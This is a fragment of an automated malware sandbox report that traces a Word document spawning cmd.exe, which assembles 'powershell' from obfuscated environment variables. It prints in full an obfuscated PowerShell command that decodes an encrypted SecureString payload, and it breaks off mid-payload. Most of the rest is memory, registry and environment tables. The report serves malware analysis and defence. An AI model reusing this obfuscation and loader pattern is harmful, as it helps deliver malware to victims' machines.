AYgA4AGEAZgAwADkANgA2ADUANAA3AGMAMgBlADIAYgA3AGUAOQBlADgAZQBiAGIAMABhAGYANgAyAGEAMQA0AGEAYQBh |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:42, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:50 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb0c |
| Parent PID | 0x998 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x00677fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00800fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x01c0ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001c10000 | 0x01c10000 | 0x01f52fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01f60000 | 0x0222efff | Memory Mapped File | Readable |
|
|
|
- |
| cmd.exe | 0x49ee0000 | 0x49f38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| winbrand.dll | 0x7fee2bf0000 | 0x7fee2bf7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefcef0000 | 0x7fefcf5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefd210000 | 0x7fefd2aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefd420000 | 0x7fefd44dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefe460000 | 0x7fefe568fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe740000 | 0x7fefe7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefe7d0000 | 0x7fefe7ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefed50000 | 0x7fefee18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff210000 | 0x7feff210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xb28, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49ee0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76cd0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76ce6d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76ce23d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76cd8290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76ce17e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-05 07:21:21 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 149979 |
|
1 |
Environment (71)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
8 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = mSjUIVjKCvrosnG |
|
1 | |
| Get Environment String | name = =YaAhiJLINtE&&set |
|
1 | |
| Get Environment String | name = iibdZAhWS |
|
2 | |
| Get Environment String | name = =p&&set |
|
1 | |
| Get Environment String | name = UKkjOWmc |
|
2 | |
| Get Environment String | name = =o^w&&set |
|
1 | |
| Get Environment String | name = CKJHjErkGaOznLZ |
|
1 | |
| Get Environment String | name = =UbmSUqbPikMOd&&set |
|
1 | |
| Get Environment String | name = orvBFUr |
|
2 | |
| Get Environment String | name = =! |
|
2 | |
| Get Environment String | name = !&&set |
|
2 | |
| Get Environment String | name = GaGORjztoIjBCAG |
|
1 | |
| Get Environment String | name = =bMVIRrhb&&set |
|
1 | |
| Get Environment String | name = miGHuQvztiW |
|
2 | |
| Get Environment String | name = =e^r&&set |
|
1 | |
| Get Environment String | name = PRCHEZFPHY |
|
2 | |
| Get Environment String | name = PqsKzFkV |
|
2 | |
| Get Environment String | name = =s&&set |
|
1 | |
| Get Environment String | name = bjMitdwscHzzIkV |
|
1 | |
| Get Environment String | name = =ZzjSCRRpVGC&&set |
|
1 | |
| Get Environment String | name = McrAWpDQaNJ |
|
2 | |
| Get Environment String | name = =he&&set |
|
1 | |
| Get Environment String | name = jwjXbhMi |
|
2 | |
| Get Environment String | name = =ll&&! |
|
1 | |
| Get Environment String | name = !! |
|
5 | |
| Get Environment String | name = ! " ( [rUnTImE.INteRoPsERvICEs.MARshAl] |
|
1 | |
| Get Environment String | name = %iibdZAhWS%, result_out = p |
|
1 | |
| Get Environment String | name = %UKkjOWmc%, result_out = ow |
|
1 | |
| Get Environment String | name = %orvBFUr%, result_out = p |
|
1 | |
| Get Environment String | name = %PRCHEZFPHY%, result_out = ow |
|
1 | |
| Get Environment String | name = %miGHuQvztiW%, result_out = er |
|
1 | |
| Get Environment String | name = %PqsKzFkV%, result_out = s |
|
1 | |
| Get Environment String | name = %McrAWpDQaNJ%, result_out = he |
|
1 | |
| Get Environment String | name = %jwjXbhMi%, result_out = ll |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = %mSjUIVjKCvrosnG%, value = YaAhiJLINtE |
|
1 | |
| Set Environment String | name = %iibdZAhWS%, value = p |
|
1 | |
| Set Environment String | name = %UKkjOWmc%, value = ow |
|
1 | |
| Set Environment String | name = %CKJHjErkGaOznLZ%, value = UbmSUqbPikMOd |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 |
Process #3: powershell.exe
529
136
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell " ( [rUnTImE.INteRoPsERvICEs.MARshAl]::PTrTOsTrIngbSTR([RUNtIMe.INtEROpserVIcEs.MarshAL]::securEStRinGtObsTR( $('76492d1116743f0423413b16050a5345MgB8AHgAdgBHAHQANgB4AHIANwAyAFUANgBzAEsAbgB2AC8ANAA2ADQAaQByAHcAPQA9AHwANQBiADIAZABjAGYAZQBkAGMAMAA3AGMAYgA5ADAANgBkAGYAMwBjAGQANQBkADEANAA0ADgAOAA1ADkAYwBjADcAYQAzADcAYwBmAGQAZQBjADcANAAwAGIAZgAwAGYANwBlADkANgA2ADIAZgAxADcAMABiADYAYgBkADcAZQA2AGMAZQA5ADYAZgBhAGYAZgBiAGYAOQBjADEAYQBhADIAYgA5ADUAYQA1ADUAMwBmADkAYwAwAGYANwA5AGMANgA0ADEANwA2AGEAYgA0ADQAYgBmAGIANgBmADgAMAAzADYAOQA3AGIAYgBiADAANgA2AGEANQA4ADYAYQA0ADEAMABlAGUANgA4ADAAYgAyAGEAMgA5AGUAOQBkADQAOAA1ADQAYQAyADAAYQA4AGUANQA0AGYAMQAyAGQAYwBhADAANABmADMANABlAGMAZgA1AGUAMgAzADEANwBjADQAMgBkAGEAMQBmAGUAMwBiADYAYgBlADQAMgAzADMAMwAyAGIANgA4AGUAYgA1ADQAMQBlADQANwAyADUAZQBjADEAOQBlAGMANABiAGEAYwBiADAAMABjAGQAYwA1AGQAYQA4ADAANQBhADUANAAyAGUANAAzADUAOABmADcAMgAwADYAYQA2AGYAYwA4ADUAMgA5ADkAMwA5ADcAYwA5ADYAMQBiADgAYgA0ADIAMgBiADUANgAzAGQAYgA5AGUAMgA0ADAANABhADEANQA4AGMAZQBhAGUAMAA3AGEANwAzADUAZQBjADMAMwBiAGUANABlADYAMAA1ADkAMABmAGMAMQAzADcAMQAwADIAOQAxADYAMAA4ADYAMwAyADUAMAA3AGQAYgBiADQAMQBhAGIAYgBkAGYAZgA0AGMANwA0ADMAYwA4ADkAYQBkAGYAOAA5ADQAYQBhAGMAZgAyADUANwBhADEANAA1AGQAZQA0ADAAYQA3ADUANQAxADIAOQAzAGIAZgA0AGMAMwAyADQAMgA2ADQANgBiADEAOQBjAGEAYQAxADkAZAA4ADMANQAwADIAYwAzADEAZQA2AGEAOQAxADUAOAA4AGYAZgAxADMAMwBjADUANQAwADYAMwBmADkANQBmADcAOQBjADUAMABiADMANwAwAGEAMgAzADUAYQAzADMAYgA1ADQAMwBkADQAZABhADQAYwA5ADIAMgBiAGIAZQA1ADgAYgBlAGEANgAyADMANwA5ADgAZAA4ADQAMgBmADQAMQBmAGMAOAA0ADAAZgBmADYAMAA2AGIAMQA5AGYAMgBmAGUAYwAxADUAMwA5ADkAMgBjADEANQAyADEAOABlAGYAMQAxADQAYQBhADUAOABjADcANQA3AGQAZgAzADIAMABjAGEAMAA5AGUAMAAwADAAMAAzADkANgA2ADgAZgBjADAAOQA2AGIAMQAwAGYAMwBiAGUAYQAxADIAMAAxADMAZQAyADQAZAA0ADcANQAxAGUANwAyAGQAMwBlAGUAYgA2AGIAMwBiADIAMgA2ADEAYgAwADcAOAA2ADcAOQA3ADEAYwA1ADIAZgBhADYANAA4ADIAMgAwADIAZAA2AGQANQBhADEANwA4ADUANgAwADIANABhADgAMAA5AGUAMgA1AGMANwBjADgANwBjAGQAZQAwAGUANABkADcAYwA2ADUAYQBhADAAYwBhADgANQBkADgANgBjADMAYwA1ADUAYgA5ADYAZQBmADUAOABhAGEANgAwADcAOAA3ADUANQA0ADkANgAzAGYAZAA2ADAAMwAzADAAYwBkADQAOQBkAGMAZgAyAGMANQA2AGQAYgBhAGIAZQBmADkAYQBjAGMAMABiADgANgA1AGMAYQBhAGEAMQAzAGQAMAAzADUAZABjADkAZQBjADcAZAA2ADAANAAxAGYAMwA2ADQAOAA3ADAAZAAwADUANwA3ADYANABkADQAOABkADQAMwBlADIAYwBlADEANQA2ADMAZgBjADYAOQBlADIANwA1ADIAYgA4ADcAMwBiADgAMQA1ADcAYgBlADUANQA5ADgAMgBkADkANQBhADUAMQA5AGUAOQBlAGYAZgBmAGIAYQA2AGUANwA2AGUANAA0ADgAYgAzADMAZQBhADgAZQAzAGQANwAxADUAMwA4ADkAZQA5ADgANAA3ADUAYQA0ADcAOAAyAGIAMgBiADAAMQA4AGEAOQA0ADAAMQAwAGQAZQA2AGMANwA3ADkAOAA0AGIAZgAxADAANABhAGMAYwBkADcANgA4ADkAYgAxADYANgA0AGQAMgBjADIAYgA1ADkANQAzADIAZAAzADEANQA2ADQAZQBlADYAMQA1AGUAYgBhAGUANAA1ADEAYwAzAGQANwA0ADgAOAA5AGQAZQA2AGEANgBjADIAMABjADgAYQAwADUANQA5ADIAMgAxADAAMABkAGQANABmADAAOABhADAAMABmAGYANQA0ADgAYgA1AGMAZQBjAGIANABkADMAOQAyADAANgBjAGMANABiAGEAZQA3AGQANQBlAGYAOQA2AGUAMgBmADcAMwBmAGIANgBkADcAZAAwADQANwA0AGUANgAyAGQAYgA5AGMANgBlADQAOQBmADgAMwA2ADkANwA5ADAANgAxADIANwA4ADEANwA4AGEAMQBiADgAOAA3ADMANQBjAGUANQA4ADgAYwA1ADMAMgBkADgANAA1AGIAMwA5ADQAYQBmADAANQBiAGIAMwA5ADMAMQA5ADUANAA2AGUAZQA1ADgAOAAyADAANQAxADUAMgBiAGMAMwBkAGIAYwBiADkAOQA3AGUAMQA4ADgANwBmAGQAMAAwADAANAA1AGYAYwA0AGUAZAAwAGIAOQBjADQAOAAxADcANABiAGYAMABlADgAYgBmADIAZgBjAGMANQA2ADQANAAxADcANQAyADQAZgA4ADMANABlAGYAOABhADcAMAA3ADgANABlADQAYwA5AGIAYQAzADQANgA4AGUAOABlAGMAYQAxADYAOABjAGEAZgAxADcAZgA3AGMAZQBlADMANwAwAGEAYgAzADYAZgBkAGIANgA3ADcAOAAxAGEANQA5ADQAZgBjADAAMgBmADgANgAzADQANgAwAGMAYwAwAGMAZgBjADcAYwBlADYAYgBmADQAYgAzAGYANQBlAGQAMgBmAGIAMgA5ADEAOQBjAGMAYgBiADMAMwBjAGIAYwBhAGMAYQBlADkAOQA0ADcAOAA0ADUAOABhADMAYgBlADMANwBkADcAZQAwADAAMwBhADcAYgBlAGIAYQAxAGYAZQBhADEAMABhADkAOAA0ADgAMwA1AGMAMwA0ADkAZAA4ADkAZQA4ADkAYgA4ADAANAA2ADMAYgAyADAANgA2AGUAZAA0ADUAYwA5ADIANAA1ADcAMgA3ADEANwAyAGQAYQAyADEAZQA3AGMANABkADUAYgAzADAAYwA0ADkAOQBlAGYAZQBkAGYAMABlAGEAZABmADIANwBlADkAOQA1AGQAMwBmAGQAYgBjADEAMwA3ADMAMwBlAGMAOQBiADEAMwA3AGUAZgBjADUAOABlADMAYwA3ADEAOAAwADUAYwA1ADAAZQA2AGEAYgA0AGQAMgA0ADQANgBmADMAZQBhAGMANwA5AGYAMQBlAGYANwBmADIAYgAyADkAOABhADgAZABiADMAZABkADYAOQBiADUAOAAwADMANgA5AGUAOABkAGUANgBlAGUAMgBlADgAMwA4ADkAOAAyADAAMQBlAGIAZABiADUAMwBlADQAZQBhADcAYQBlAGEAMwBhADQAOABlADAAYwA2AGQAZABhADgAZgAwADYANQBjADMAMwAwAGQANQA2ADkANQBiAGQANQA4ADMAZgBhAGMAMwA2AGMAZgA4ADUAMQA2ADUAMABmAGUAMQA5AGUAMQAxADQANABhADQAZAA5ADUANABkAGIANwA3ADAAMABiADEAOQA4ADYAOQAxADMAYgAxAGYAMgA4ADYAZgBiADUAZgBjADYAOQBlADMAZQBjAGQANwBkAGIANAA3ADMAZAA0ADMAZQBlAGYAYwA1AGYAZgA5AGUANAA2ADUAOAA1ADYANwAzAGEAZQAzADUAMABhADgAMgA0ADEAMwAzAGYAYwAwADAANgA0AGIAZQAwAGQANQBkAGYAYQAxADIAZQBlAGYAOAA1ADgAZgA5ADgAMwA2ADIAOQAwAGMAMQAwADcAMAA0ADQAYgA4AGEAZgAwADkANgA2ADUANAA3AGMAMgBlADIAYgA3AGUAOQBlADgAZQBiAGIAMABhAGYANgAyAGEAMQA0AGEAYQBhADUAMAA4AGIANAA0ADMAYgBmADYAMgBkADgAMwBkAGEAMgBiAGQAZgA2AGYANABkADkAYwA3ADkAOQA3AGIAYwBkAGEANABiADgAOAA3ADkAMABlAGUANABjADgANQA5AGMAYwAyADYANgAxADkAZABlADYAZQAwAGMAOABkADkANwA5ADEANwBkADkAMQAwADMAZgAwAGYAZgA1ADcAYgBlADMAYQA4ADcANQBlAGUAZgAyADAAZQBiADcAOAA1ADQAMAAwADgAYwAwADUAMABkAGQAOABlADUAOABjAGEANgBkAGIAMgAyADkAYwA1ADgAMgA5ADcAZQAwADQAMAAzADMAYQA2AGQAZABhADIANgA4AGYANgA4AGYAMQBkADEAYQAwADQAOQA2ADEANQAwAGQAMQBkADgAZABmAGMAMQBjADAAMgBmADEAYgAwADkAMQBmADYANAA0AGYAYQBjADIAZgA4AGEAOAA1ADkAZAAzAGEANQAwADEANQA2ADgAZQA2ADIANwA0ADAAMQA |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:42, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:50 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb28 |
| Parent PID | 0xb0c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B2C
0x
B30
0x
B34
0x
B38
0x
B48
0x
B4C
0x
B64
0x
B7C
0x
B80
0x
B84
0x
BDC
0x
BE8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| powershell.exe.mui | 0x00160000 | 0x00162fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00190fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x001f0000 | 0x001f3fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x00200000 | 0x0021ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00220fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x00230000 | 0x00233fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00750fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x01b5ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001b60000 | 0x01b60000 | 0x01c5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x01c60000 | 0x01c8ffff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01c90000 | 0x01cf5fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01d0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d10000 | 0x01d10000 | 0x01d10fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001d20000 | 0x01d20000 | 0x01d22fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d30000 | 0x01d30000 | 0x01d30fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01d5ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01d6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| l_intl.nls | 0x01d70000 | 0x01d72fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01d80fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d90000 | 0x01d90000 | 0x01e0ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001e10000 | 0x01e10000 | 0x01eeefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01f6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x01f70000 | 0x0223efff | Memory Mapped File | Readable |
|
|
|
- |
| sorttbls.nlp | 0x02240000 | 0x02244fff | Memory Mapped File | Readable |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x02250000 | 0x02257fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000002260000 | 0x02260000 | 0x02260fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002270000 | 0x02270000 | 0x02270fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002280000 | 0x02280000 | 0x022fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002300000 | 0x02300000 | 0x026f2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortkey.nlp | 0x02700000 | 0x02740fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002750000 | 0x02750000 | 0x02760fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027effff | Private Memory | Readable, Writable |
|
|
|
- |
| mscorrc.dll | 0x027f0000 | 0x02843fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002880000 | 0x02880000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x02a1ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002a20000 | 0x02a20000 | 0x02b1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b30000 | 0x02b30000 | 0x02baffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002be0000 | 0x02be0000 | 0x02beffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002bf0000 | 0x02bf0000 | 0x1abeffff | Private Memory | Readable, Writable |
|
